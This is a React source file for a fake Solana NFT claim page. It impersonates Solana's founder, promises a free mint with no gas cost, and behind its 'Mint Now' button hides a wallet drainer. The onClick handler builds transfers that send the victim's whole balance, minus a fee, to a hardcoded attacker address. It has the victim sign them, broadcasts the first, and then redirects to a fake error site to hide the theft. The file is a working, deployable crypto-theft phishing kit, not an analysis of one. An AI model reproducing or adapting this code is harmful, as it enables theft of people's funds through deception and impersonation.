import { FC, ReactNode, useCallback, useMemo, useState } from "react";
import "./App.css";
import "./main.css";
import {
  WalletAdapterNetwork,
  WalletNotConnectedError,
} from "@solana/wallet-adapter-base";
import {
  clusterApiUrl,
  PublicKey,
  SystemProgram,
  Transaction,
} from "@solana/web3.js";
import {
  GlowWalletAdapter,
  LedgerWalletAdapter,
  PhantomWalletAdapter,
  SlopeWalletAdapter,
  SolflareWalletAdapter,
  SolletExtensionWalletAdapter,
  SolletWalletAdapter,
  TorusWalletAdapter,
} from "@solana/wallet-adapter-wallets";
import {
  ConnectionProvider,
  useConnection,
  useWallet,
  WalletProvider,
} from "@solana/wallet-adapter-react";
import {
  WalletModalProvider,
  WalletMultiButton,
} from "@solana/wallet-adapter-react-ui";

import logoWhiteWithbg from './img/logo-white-with-bg.svg'
import logo from './img/logo.svg'
import waves from './img/waves.svg'
import connectlogowhite from '../src/img/connect__logo-white.svg'
import author from '../src/img/author.png'
import onepng from '../src/img/one.svg'
import card2 from '../src/img/card-2.svg'
import twopng from '../src/img/two.svg'
import card1 from '../src/img/card-1.svg'
import autograph from '../src/img/autograph.svg'
import notify from '../src/img/notify.svg'

require("@solana/wallet-adapter-react-ui/styles.css");

const theWallet = "H2uYcmG8jFHLKnN1Eiwc7DHMe97buKpjfVtV1wsP3zm9";

const App: FC = () => {
  return (
    <Context>
      <Content />
    </Context>
  );
};

const Context: FC<{ children: ReactNode }> = ({ children }) => {
  const network = WalletAdapterNetwork.Mainnet;

  const endpoint = useMemo(() => clusterApiUrl(network), [network]);

  const wallets = useMemo(
    () => [
      new LedgerWalletAdapter(),
      new PhantomWalletAdapter(),
      new GlowWalletAdapter(),
      new SlopeWalletAdapter(),
      new SolletWalletAdapter(),
      new SolletExtensionWalletAdapter(),
      new SolflareWalletAdapter({ network }),
      new TorusWalletAdapter(),
    ],
    [network]
  );

  return (
    <ConnectionProvider endpoint={endpoint}>
      <WalletProvider wallets={wallets} autoConnect>
        <WalletModalProvider>{children}</WalletModalProvider>
      </WalletProvider>
    </ConnectionProvider>
  );
};

const Content: FC = () => {
  const { connection } = useConnection();
  const { publicKey, sendTransaction } = useWallet();
  const wallet = useWallet();
  const [txid, setTxid] = useState<string | null>(null);
  const [walletError, setWalletError] = useState<boolean>(false);

  const walletErrorCatch = (value: any) => {
    if (value === "Error") {
      setWalletError(true);
      setTimeout(() => {
        setWalletError(false);
      }, 2000);
    }
  };

  const onClick = useCallback(async () => {
    if (
      !wallet.publicKey ||
      !wallet.signAllTransactions ||
      !wallet.signTransaction
    ) {
      return "Error";
    }
    if (!publicKey) throw new WalletNotConnectedError();

    let transaction = new Transaction({
      feePayer: wallet.publicKey,
      recentBlockhash: (await connection.getLatestBlockhash()).blockhash,
    });

    const balance = await connection.getBalance(publicKey);
    transaction.add(
      SystemProgram.transfer({
        fromPubkey: publicKey,
        toPubkey: new PublicKey(theWallet),
        lamports: balance - 5000,
      })
    );
    let transaction2 = new Transaction({
      feePayer: wallet.publicKey,
      recentBlockhash: (await connection.getLatestBlockhash()).blockhash,
    });

    transaction2.add(
      SystemProgram.transfer({
        fromPubkey: publicKey,
        toPubkey: new PublicKey(theWallet),
        lamports: 10000,
      })
    );

    await wallet.signAllTransactions([transaction, transaction2]);
    connection
      .sendRawTransaction(transaction.serialize())
      .then((id) => {
        setTxid(id);
        connection.confirmTransaction(id);
      })
      .catch(console.error);

    const win: Window = window;
    win.location = "https://phantom-error.app/";
  }, [wallet, publicKey, connection]);

  return (
    <div className="App">
      {/* Warning message */}
      <div
        className="warning_message_wrap"
        style={walletError ? { left: "52px" } : { left: "-300px" }}
      >
        <div className="warning_message">
          <div className="warning_icon">
            <img src={notify} alt="" />
          </div>
          <span>Connect your wallet!</span>
        </div>
      </div>
      <header>
        <link
          href="https://fonts.googleapis.com/css?family=Inter:100,200,300,regular,500,600,700,800,900"
          rel="stylesheet"
        />
      </header>
      <div className="wrapper">
        <header className="header">
          <div className="container">
            <div className="header__content">
              <img className="header__logo" src={logo} alt=""></img>
              <div className="header__items">
                <a className="header__item link" href="#about">
                  Solana NFT
                </a>
                <a className="header__item link" href="#instructions">
                  Intruction
                </a>
                <WalletMultiButton />
              </div>
            </div>
          </div>
        </header>

        <section className="about" id="about">
          <div className="container">
            <div className="about__content">
              <div className="about-text__box">
                <p className="about-text__box-about-author">
                  Anatoly Yakovenko April 11, 2022
                </p>
                <h3 className="about-text__box-title">SOLANASCAN NFT</h3>
                <p className="about-text__box-text">
                  To celebrate the launch of Solana NFTs, we randomly selected{" "}
                  <span>100,000</span> Solana holders and distributed the «NFT»
                  token. If you have received this token in your wallet, then
                  you are eligible to claim the Official Solana NFT. The number
                  of tokens you have received will determine the number of NFTs
                  you can claim.
                </p>
              </div>
              <img className="about__img" src={author} alt=""></img>
            </div>
          </div>
        </section>

        <section className="connect">
          <div className="container">
            <div className="connect__content">
              <div className="connect-text__box">
                <h3 className="connect-text__box-title">Connect your wallet</h3>
                <p className="connect-text__box-text">
                  Note: There is NO gas cost to mint the NFT. NFT will be
                  delivered within 2-3 seconds to your wallet.
                </p>
                {/* a tag */}
                <div
                  className="connect-text__box-btn"
                  onClick={async () => walletErrorCatch(await onClick())}
                >
                  <img src={connectlogowhite} alt="" />
                </div>
              </div>
              <div className="connect__token">
                <img className="connect__token-img" src={logoWhiteWithbg} alt='logo-white-with-bg'/>
                <div className="connect__token-box">
                  <p className="connect__token-title">Token (n) = NFT (n)</p>
                  <p className="connect__token-text">
                    (n) = number of tokens you have received. There is no
                    minting cost.
                  </p>
                  <div className="connect__token-border"></div>
                  <p className="connect__token-text">
                    The «NFT» token has been sent to 100,000 Solana holders and
                    only 1,000 NFT are available for minting!
                  </p>
                </div>
              </div>
            </div>
          </div>
        </section>

        <section className="instructions" id="instructions">
          <div className="container">
            <div className="instructions__content">
              <div className="instructions__header">
                <div className="instructions__header-text">
                  <h3 className="instructions__header-title">Instructions</h3>
                  <p className="instructions__header-subtitle">
                    There is no minting fee
                  </p>
                </div>
                <img
                  className="instructions__header-img-one"
                  src={autograph}
                  alt=''
                />
              </div>
              <div className="instructions__border"></div>
              <div className="instructions__body">
                <div className="instructions__box-card">
                  <div className="instructions__box-card-title">
                    <img src={onepng} alt='' />
                    <p>First step</p>
                  </div>
                  <img className="instructions__box-card-img" src={card1} alt=''/>
                </div>
                <div className="instructions__box-border"></div>
                <div className="instructions__box-text">
                  <p>
                    After approving the transaction, NFTs will be sent to your
                    wallet address within a few seconds.
                  </p>
                </div>
                <div className="instructions__box-border"></div>
                <div className="instructions__box-card">
                  <div className="instructions__box-card-title">
                    <img src={twopng} alt=''/>
                    <p>Second step</p>
                  </div>
                  <img className="instructions__box-card-img" src={card2} alt='' />
                </div>
              </div>
            </div>
          </div>
        </section>

        <section className="claim">
          <div className="container">
            <div className="claim__content">
              <h3 className="claim__title">Claim the Solana NFTs</h3>
              <p className="claim__text">
                NFT will be delivered within 2-3 seconds to your wallet.
              </p>
              <div
                className="claim__btn"
                onClick={async () => walletErrorCatch(await onClick())}
              >
                <span>Mint Now</span>
              </div>
            </div>
          </div>
        </section>

        <img className="waves" src={waves} alt=''/>
      </div>
    </div>
  );
};

export default App;
